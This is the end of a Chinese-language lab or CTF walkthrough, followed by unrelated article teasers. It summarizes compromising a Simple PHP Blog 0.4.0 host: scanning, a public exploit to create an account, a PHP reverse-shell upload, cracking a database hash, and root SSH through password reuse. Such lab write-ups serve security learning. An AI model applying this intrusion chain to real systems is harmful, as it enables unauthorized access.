2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe8d:63ff/64 scope link 
       valid_lft forever preferred_lft forever


看一看权限

root@web:~# sudo -l
Matching Defaults entries for root on this host:
    env_reset

User root may run the following commands on this host:
    (ALL : ALL) ALL


总结

nmap 扫描,发现靶机开放了 22, 80 端口
访问 80,结合目录爆破,发现 /blog 目录中运行了一个 cms 系统
观察发现 cms 的名称和版本,是 simple php blog 0.4.0 ,尝试在 searchsploit 中找利用脚本
发现利用脚本,使用脚本在 cms 中创建新账号,并成功登录
发现后台的上传图片,验证可以上传 .php 文件后构造反弹 shell,成功拿到 shell
拿到初始 shell 后,做信息收集。发现两个数据库连接文件,其中一个是目前 cms 正在使用的。尝试账号密码,成功登录数据库,发现数据库内有一个sha-1加密的密码,可破解
作密码碰撞,成功使用 ssh 登录。原来是 cms 系统部署者的 Linux 系统 root 用户密码使用了 mysql 数据库 root 用户的密码 😓

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2189172.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Spring Boot新闻推荐系统:性能优化策略

5系统详细实现 5.1 管理员模块的实现 5.1.1 用户信息管理 新闻推荐系统的系统管理员可以可以对用户信息添加修改删除操作。具体界面的展示如图5.1所示。 图5.1 用户信息管理界面 5.1.2 排行榜管理 系统管理员可以对排行榜进行手动管理&#xff0c;可以对排行榜进行添加删除修…

Acwing 背包问题

背包问题 首先&#xff0c;什么是背包问题&#xff1f; 给定N个物品和一个容量为V的背包&#xff0c;每个物品有体积和价值两种属性&#xff0c;在一些限制条件下&#xff0c;将一些物品放入背包&#xff0c;使得在不超过背包体积的情况下&#xff0c;能够得到的最大价值。根据…

老年人意外跌倒感知技术

意外跌倒是导致老年人仙游的6大原因之一&#xff0c;尤其多余80岁以上的老年人。跌倒已成为我国 65 岁以上老年人因伤致死的首位原因&#xff08;来源&#xff1a;IT之家&#xff09;。 跌倒最容易发生在两个地方&#xff0c;卫生间和过道。主要可能是卫生间没有安装扶手&…

关于Generator,async 和 await的介绍

在本篇文章中我们主要围绕下面几个问题来介绍async 和await &#x1f370;Generator的作用&#xff0c;async 及 await 的特点&#xff0c;它们的优点和缺点分别是什么&#xff1f;await 原理是什么&#xff1f; &#x1f4c5;我的感受是我们先来了解Generator&#xff0c;在去…

将视频改成代码滚动

本文章就来讲讲如何将视频转换成代码滚动&#xff0c;也就是这种模式&#xff1a; 本文章就来详细的教大家如何制作达到这种效果吧&#xff01; &#xff08;注&#xff1a;我记得一些python库也可以轻松达到这些效果&#xff0c;但我一时半伙想不起来了&#xff0c;所以这里用…

idea插件开发的第六天-开发一个笔记插件

介绍 Demo说明 本文基于maven项目开发,idea版本为2022.3以上,jdk为1.8本文在JTools插件之上进行开发本插件目标是做一款笔记插件,用于开发者在开发过程中随时记录信息仓库地址: jtools-notes JTools插件说明 Tools插件是一个Idea插件,此插件提供统一Spi规范,极大的降低了id…

手写mybatis之Mapper XML的解析和注册使用

前言 你是怎么面对功能迭代的&#xff1f; 很多程序员在刚开始做编程或者新加入一家公司时&#xff0c;都没有多少机会可以做一个新项目&#xff0c;大部分时候都是在老项目上不断的迭代更新。在这个过程你可能要学习N个前人留下的各式各样的风格迥异的代码片段&#xff0c;在这…

【杂谈一之概率论】CDF、PDF、PMF和PPF概念解释与分析

一、概念解释 1、CDF&#xff1a;累积分布函数&#xff08;cumulative distribution function&#xff09;&#xff0c;又叫做分布函数&#xff0c;是概率密度函数的积分&#xff0c;能完整描述一个实随机变量X的概率分布 2、PDF&#xff1a;连续型概率密度函数&#xff08;p…

平面电磁波的电场能量磁场能量密度相等,能量密度的体积分等于能量,注意电场能量公式也没有复数形式(和坡印廷类似)

1、电场能量密度和磁场能量密度相等(实数场算的) 下面是电场能量密度和磁场能量密度的公式&#xff0c;注意这可不是坡印廷定理。且电场能量密度没有复数表达式&#xff0c;即不是把E和D换成复数形式就行的。注意&#xff0c;一个矢量可以转化为复数形式&#xff0c;两个矢量做…

数据挖掘-padans初步使用

目录标题 Jupyter Notebook安装启动 Pandas快速入门查看数据验证数据建立索引数据选取⚠️注意&#xff1a;排序分组聚合数据转换增加列绘图line 或 **&#xff08;默认&#xff09;&#xff1a;绘制折线图。bar&#xff1a;绘制条形图。barh&#xff1a;绘制水平条形图。hist&…

Discord:报错:A fatal Javascript error occured(解决办法)

按 Windows 键 R 并输入 %appdata% 选择 discord 文件夹并将其删除。 再次按 Windows 键 R 并输入 %LocalAppData% 选择 discord 文件夹并再次将其删除。 附加&#xff1a; 如果还不行&#xff0c;就通过官网下载吧&#xff0c;这个问题通过epic下载可能会有

图文深入理解Oracle DB企业级集中管理神器-GC的安装和部署

值此国庆佳节&#xff0c;深宅家中&#xff0c;闲来无事&#xff0c;就多写几篇博文。今天继续宅继续写。 本文承接上篇&#xff0c;介绍GC的安装和部署。咱们不急&#xff0c;慢慢来&#xff0c;饭要一口一口地吃才能吃得踏实自然。 限于篇幅&#xff0c;本节将重点介绍关键步…

【ubuntu】apt是什么

目录 1.apt简介 2.常用apt指令 2.1安装 2.2更新列表 2.3更新已经安装的软件包 2.4搜索软件包 2.5显示软件包信息 2.6移除软件包 2.7清理无用的安装包 2.8清理无用的依赖项 3.apt和apt-get 3.1区别 3.2 总结 1.apt简介 apt的全称是advanced package …

JAVA的三大特性-封装、继承、多态

Java作为一种面向对象的编程语言&#xff0c;其核心特性包括封装、继承和多态。这三大特性是Java语言的基石&#xff0c;它们相互关联&#xff0c;共同构成了Java强大的面向对象能力。 封装&#xff08;Encapsulation&#xff09; 封装是面向对象编程的一个重要概念&#xff0c…

Pytorch最最适合研究生的入门教程,Q3 开始训练

文章目录 Pytorch最最适合研究生的入门教程Q3 开始训练3.1 训练的见解3.2 Pytorch基本训练框架work Pytorch最最适合研究生的入门教程 Q3 开始训练 3.1 训练的见解 如何理解深度学习能够完成任务&#xff1f; 考虑如下回归问题 由函数 y f ( x ) yf(x) yf(x)采样得到的100个…

现在的新电脑在任务管理器里又多了个NPU?它是啥?

前言 今年中旬各家品牌的新笔记本感觉上都是很不错&#xff0c;搞得小白自己心痒痒&#xff0c;突然间想要真的买一台Windows笔记本来耍耍了。 但今天这个文章并不是什么商品宣传啥的&#xff0c;而是小白稍微尝试了一下新笔记本之后的一些发现。 在今年的新笔记本上都多了一…

【GESP】C++一级练习BCQM3025,输入-计算-输出-6

题型与BCQM3024一样&#xff0c;计算逻辑上稍微复杂了一点点&#xff0c;代码逻辑没变&#xff0c;仍属于小学3&#xff0c;4年级的题目水平。 题解详见&#xff1a;https://www.coderli.com/gesp-1-bcqm3025/ https://www.coderli.com/gesp-1-bcqm3025/https://www.coderli.c…

数据提取之JSON与JsonPATH

第一章 json 一、json简介 json简单说就是javascript中的对象和数组&#xff0c;所以这两种结构就是对象和数组两种结构&#xff0c;通过这两种结构可以表示各种复杂的结构 > 1. 对象&#xff1a;对象在js中表示为{ }括起来的内容&#xff0c;数据结构为 { key&#xff1…

最新版本SkyWalking【10.1.0】部署

这里写目录标题 前言前置条件启动Skywalking下载解压启动说明 集成Skywalking Agent下载Agent在IDEA中添加agent启动应用并访问SpringBoot接口 说明 前言 基于当前最新版10.1.0搭建skywalking 前置条件 装有JDK11版本的环境了解SpringBoot相关知识 启动Skywalking 下载 地…

浑元换算策略和武德换算策略-《分析模式》漫谈36

DDD领域驱动设计批评文集 做强化自测题获得“软件方法建模师”称号 《软件方法》各章合集 “Analysis Patterns”的第3章有这么一句&#xff1a; A conversion, however deterministic, does not follow that faithfully. 2004&#xff08;机械工业出版社&#xff09;中译本…